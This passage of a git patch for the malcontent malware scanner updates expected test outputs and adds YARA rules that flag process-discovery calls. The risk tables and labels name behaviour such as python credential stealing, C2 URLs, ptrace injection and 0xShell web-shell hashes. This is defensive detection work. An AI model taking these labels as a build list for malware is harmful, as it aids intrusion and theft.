[createPidFile](https://github.com/search?q=createPidFile&type=code) | -| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code)
[Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code) | -| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[passwords](https://github.com/search?q=passwords&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code) | -| LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | -| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#known_ptrace_injectors) | known ptrace injectors | [BPF](https://github.com/search?q=BPF&type=code) | -| LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | -| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | -| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | -| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [ewriteConfigOverwriteFile](https://github.com/search?q=ewriteConfigOverwriteFile&type=code) | -| LOW | [fs/lock_update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | -| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/myredis.conf](https://github.com/search?q=%2Fetc%2Fmyredis.conf&type=code)
[/etc/rc.local](https://github.com/search?q=%2Fetc%2Frc.local&type=code)
[/etc/redis/](https://github.com/search?q=%2Fetc%2Fredis%2F&type=code)
[/etc/sentinel.conf](https://github.com/search?q=%2Fetc%2Fsentinel.conf&type=code)
[/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code) | -| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) | -| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | -| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | -| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | -| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [recv](https://github.com/search?q=recv&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [send](https://github.com/search?q=send&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.) | -| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | -| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|----------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[master_port](https://github.com/search?q=master_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code) | +| MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [execCommandAbort](https://github.com/search?q=execCommandAbort&type=code)
[replicaStartCommandStream](https://github.com/search?q=replicaStartCommandStream&type=code) | +| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | +| MEDIUM | [exec/shell/echo](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/echo.yara#elf_calls_shell_echo) | [program generates text with echo command](https://linux.die.net/man/1/echo) | [echo 'maxmemory 128mb'](https://github.com/search?q=echo+%27maxmemory+128mb%27&type=code)
[echo madvise > /sys/kernel/mm/transparent_hugepage/enabled' as root](https://github.com/search?q=echo+madvise+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27+as+root&type=code)
[echo never > /sys/kernel/mm/transparent_hugepage/enabled'](https://github.com/search?q=echo+never+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27&type=code)
[echo tsc > /sys/devices/system/clocksource/clocksource0/current_clock](https://github.com/search?q=echo+tsc+%3E+%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0%2Fcurrent_clock&type=code) | +| MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFileEvent](https://github.com/search?q=CreateFileEvent&type=code) | +| MEDIUM | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#DeleteFile) | delete a file | [DeleteFileEvent](https://github.com/search?q=DeleteFileEvent&type=code) | +| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch the specified keys](https://github.com/search?q=touch+the+specified+keys&type=code) | +| MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./redis-check-aof](https://github.com/search?q=.%2Fredis-check-aof&type=code)
[./redis-server](https://github.com/search?q=.%2Fredis-server&type=code) | +| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code) | +| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | +| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | +| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | +| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | +| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | +| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | +| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [daemonize](https://github.com/search?q=daemonize&type=code) | +| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
[createPidFile](https://github.com/search?q=createPidFile&type=code) | +| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | +| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code)
[Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code) | +| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[passwords](https://github.com/search?q=passwords&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code) | +| LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | +| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | +| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | +| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | +| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | +| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | +| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | +| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [ewriteConfigOverwriteFile](https://github.com/search?q=ewriteConfigOverwriteFile&type=code) | +| LOW | [fs/lock_update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | +| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/myredis.conf](https://github.com/search?q=%2Fetc%2Fmyredis.conf&type=code)
[/etc/rc.local](https://github.com/search?q=%2Fetc%2Frc.local&type=code)
[/etc/redis/](https://github.com/search?q=%2Fetc%2Fredis%2F&type=code)
[/etc/sentinel.conf](https://github.com/search?q=%2Fetc%2Fsentinel.conf&type=code)
[/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code) | +| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) | +| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | +| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | +| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | +| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | +| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [recv](https://github.com/search?q=recv&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [send](https://github.com/search?q=send&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.) | +| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | +| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | diff --git a/tests/linux/clean/tracer.o.aarch64.simple b/tests/linux/clean/tracer.o.aarch64.simple index 887baac34..1864ab728 100644 --- a/tests/linux/clean/tracer.o.aarch64.simple +++ b/tests/linux/clean/tracer.o.aarch64.simple @@ -4,7 +4,6 @@ collect/databases/mysql: medium discover/network/netstat: medium evasion/bypass_security/linux/iptables: medium evasion/logging/acct: low -evasion/process_injection/ptrace: low impact/remote_access/heartbeat: medium net/http/post: medium net/ip/multicast_send: low diff --git a/tests/linux/clean/trivy.simple b/tests/linux/clean/trivy.simple index 948f3b110..c75e6ce7c 100644 --- a/tests/linux/clean/trivy.simple +++ b/tests/linux/clean/trivy.simple @@ -66,7 +66,6 @@ evasion/file/location/chdir_unusual: medium evasion/file/location/dev_shm: medium evasion/file/location/var_run: medium evasion/file/prefix: medium -evasion/process_injection/ptrace: low exec/cmd: medium exec/conditional/LANG: low exec/dylib/symbol_address: medium diff --git a/tests/macOS/clean/ls.mdiff b/tests/macOS/clean/ls.mdiff index 29b2837f7..939d68075 100644 --- a/tests/macOS/clean/ls.mdiff +++ b/tests/macOS/clean/ls.mdiff @@ -7,7 +7,6 @@ | -LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | -LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | -LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | -| -LOW | [hw/dev/ubi](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/ubi.yara#expected_ubi_users) | expected ubi users | [Usage:](https://github.com/search?q=Usage%3A&type=code) | | -LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | ## Added: ls [🔵 LOW] diff --git a/tests/macOS/clean/ls.sdiff.trigger_2 b/tests/macOS/clean/ls.sdiff.trigger_2 index be1dfc59f..9e0e93a9c 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_2 +++ b/tests/macOS/clean/ls.sdiff.trigger_2 @@ -3,7 +3,6 @@ -discover/system/hostname_get -exec/shell/TERM -fs/link_read --hw/dev/ubi -net/url/embedded -process/name_set ++++ added: ls diff --git a/tests/macOS/clean/ls.sdiff.trigger_3 b/tests/macOS/clean/ls.sdiff.trigger_3 index be1dfc59f..9e0e93a9c 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_3 +++ b/tests/macOS/clean/ls.sdiff.trigger_3 @@ -3,7 +3,6 @@ -discover/system/hostname_get -exec/shell/TERM -fs/link_read --hw/dev/ubi -net/url/embedded -process/name_set ++++ added: ls diff --git a/tests/php/2024.sagsooz/2024.php.simple b/tests/php/2024.sagsooz/2024.php.simple index 3789511f5..2bc7487d9 100644 --- a/tests/php/2024.sagsooz/2024.php.simple +++ b/tests/php/2024.sagsooz/2024.php.simple @@ -5,7 +5,7 @@ data/base64/decode: medium data/embedded/base64_url: medium data/embedded/html: medium data/encoding/base64: low -discover/process/effective_groupid_get: medium +discover/process/egid: medium evasion/indicator_blocking/mask_exceptions: medium evasion/time/php_no_limit: medium exec/shell/command: medium diff --git a/tests/python/2021.DiscordSafety/setup.py.simple b/tests/python/2021.DiscordSafety/setup.py.simple index b6ef8b6f4..32765505a 100644 --- a/tests/python/2021.DiscordSafety/setup.py.simple +++ b/tests/python/2021.DiscordSafety/setup.py.simple @@ -2,7 +2,7 @@ anti-static/obfuscation/hex: medium anti-static/obfuscation/python: critical anti-static/unmarshal/marshal: high -c2/addr/url: medium +c2/addr/url: high collect/databases/leveldb: medium data/encoding/base64: low data/encoding/marshal: medium diff --git a/tests/python/clean/numpy/misc_util.py.simple b/tests/python/clean/numpy/misc_util.py.simple index 8ccb1207f..6907bcce7 100644 --- a/tests/python/clean/numpy/misc_util.py.simple +++ b/tests/python/clean/numpy/misc_util.py.simple @@ -18,7 +18,6 @@ fs/path/usr_lib_python: medium fs/path/usr_local: medium fs/symlink_resolve: low fs/tempdir/create: low -hw/dev/ubi: low net/ip/spoof: medium net/url/embedded: low os/env/get: low diff --git a/tests/python/clean/versioneer/versioneer.py.simple b/tests/python/clean/versioneer/versioneer.py.simple index b075018d3..08ebb2614 100644 --- a/tests/python/clean/versioneer/versioneer.py.simple +++ b/tests/python/clean/versioneer/versioneer.py.simple @@ -6,5 +6,4 @@ data/embedded/base64_url: medium data/encoding/base64: low fs/file/open: low fs/path/usr_bin: low -hw/dev/ubi: low os/fd/write: low diff --git a/tests/windows/2024.aspdasdksa2/creal.exe.simple b/tests/windows/2024.aspdasdksa2/creal.exe.simple index 13c24270f..d6c10054b 100644 --- a/tests/windows/2024.aspdasdksa2/creal.exe.simple +++ b/tests/windows/2024.aspdasdksa2/creal.exe.simple @@ -9,7 +9,6 @@ data/compression/lzma: low data/embedded/app_manifest: medium data/encoding/base64: low discover/system/sysinfo: medium -evasion/process_injection/ptrace: low exec/program: medium exec/tty/getpass: low exfil/stealer/python: critical From bcb169d93312713938f5e9c91d21e467712b69b8 Mon Sep 17 00:00:00 2001 From: Thomas Stromberg Date: Sun, 10 Nov 2024 08:37:26 -0500 Subject: [PATCH 5/7] Renamed rules --- rules/discover/process/egid.yara | 27 +++++++++++++++++++ rules/discover/process/euid.yara | 12 +++++++++ rules/discover/process/pid.yara | 13 +++++++++ rules/discover/process/priority.yara | 11 ++++++++ rules/discover/process/resource-limits.yara | 13 +++++++++ rules/discover/process/uid.yara | 12 +++++++++ rules/discover/process/working_directory.yara | 24 +++++++++++++++++ 7 files changed, 112 insertions(+) create mode 100644 rules/discover/process/egid.yara create mode 100644 rules/discover/process/euid.yara create mode 100644 rules/discover/process/pid.yara create mode 100644 rules/discover/process/priority.yara create mode 100644 rules/discover/process/resource-limits.yara create mode 100644 rules/discover/process/uid.yara create mode 100644 rules/discover/process/working_directory.yara diff --git a/rules/discover/process/egid.yara b/rules/discover/process/egid.yara new file mode 100644 index 000000000..65139d4ed --- /dev/null +++ b/rules/discover/process/egid.yara @@ -0,0 +1,27 @@ +rule getegid: harmless { + meta: + syscall = "getegid" + description = "returns the effective group id of the current process" + + strings: + $getuid = "getegid" fullword + $Getuid = "Getegid" fullword + + condition: + any of them +} + +rule php_getmygid: medium { + meta: + syscall = "getegid" + description = "returns the effective group id of the current process" + hash_2023_0xShell_0xShellori = "506e12e4ce1359ffab46038c4bf83d3ab443b7c5db0d5c8f3ad05340cb09c38e" + hash_2023_0xShell_root = "3baa3bfaa6ed78e853828f147c3747d818590faee5eecef67748209dd3d92afb" + hash_2023_0xShell_wesoori = "bab1040a9e569d7bf693ac907948a09323c5f7e7005012f7b75b5c1b2ced10ad" + + strings: + $getmygid = "getmygid" + + condition: + any of them +} diff --git a/rules/discover/process/euid.yara b/rules/discover/process/euid.yara new file mode 100644 index 000000000..e3baa0a8c --- /dev/null +++ b/rules/discover/process/euid.yara @@ -0,0 +1,12 @@ +rule geteuid: harmless { + meta: + syscall = "geteuid" + description = "returns the effective user id of the current process" + + strings: + $getuid = "geteuid" fullword + $Getuid = "Geteuid" fullword + + condition: + any of them +} diff --git a/rules/discover/process/pid.yara b/rules/discover/process/pid.yara new file mode 100644 index 000000000..5c2b72256 --- /dev/null +++ b/rules/discover/process/pid.yara @@ -0,0 +1,13 @@ +rule getpid: harmless { + meta: + syscall = "getpid" + description = "gets the active process ID" + + strings: + $ref = "getpid" fullword + $Getpid = "Getpid" fullword + $procID = "processID" fullword + + condition: + any of them +} diff --git a/rules/discover/process/priority.yara b/rules/discover/process/priority.yara new file mode 100644 index 000000000..722ac201e --- /dev/null +++ b/rules/discover/process/priority.yara @@ -0,0 +1,11 @@ +rule getpriority: harmless { + meta: + syscall = "getpriority" + pledge = "proc" + + strings: + $ref = "getpriority" fullword + + condition: + any of them +} diff --git a/rules/discover/process/resource-limits.yara b/rules/discover/process/resource-limits.yara new file mode 100644 index 000000000..80f6c2193 --- /dev/null +++ b/rules/discover/process/resource-limits.yara @@ -0,0 +1,13 @@ +rule getrlimit: harmless { + meta: + syscall = "getrlimit" + description = "retrieve resource limits" + pledge = "id" + + strings: + 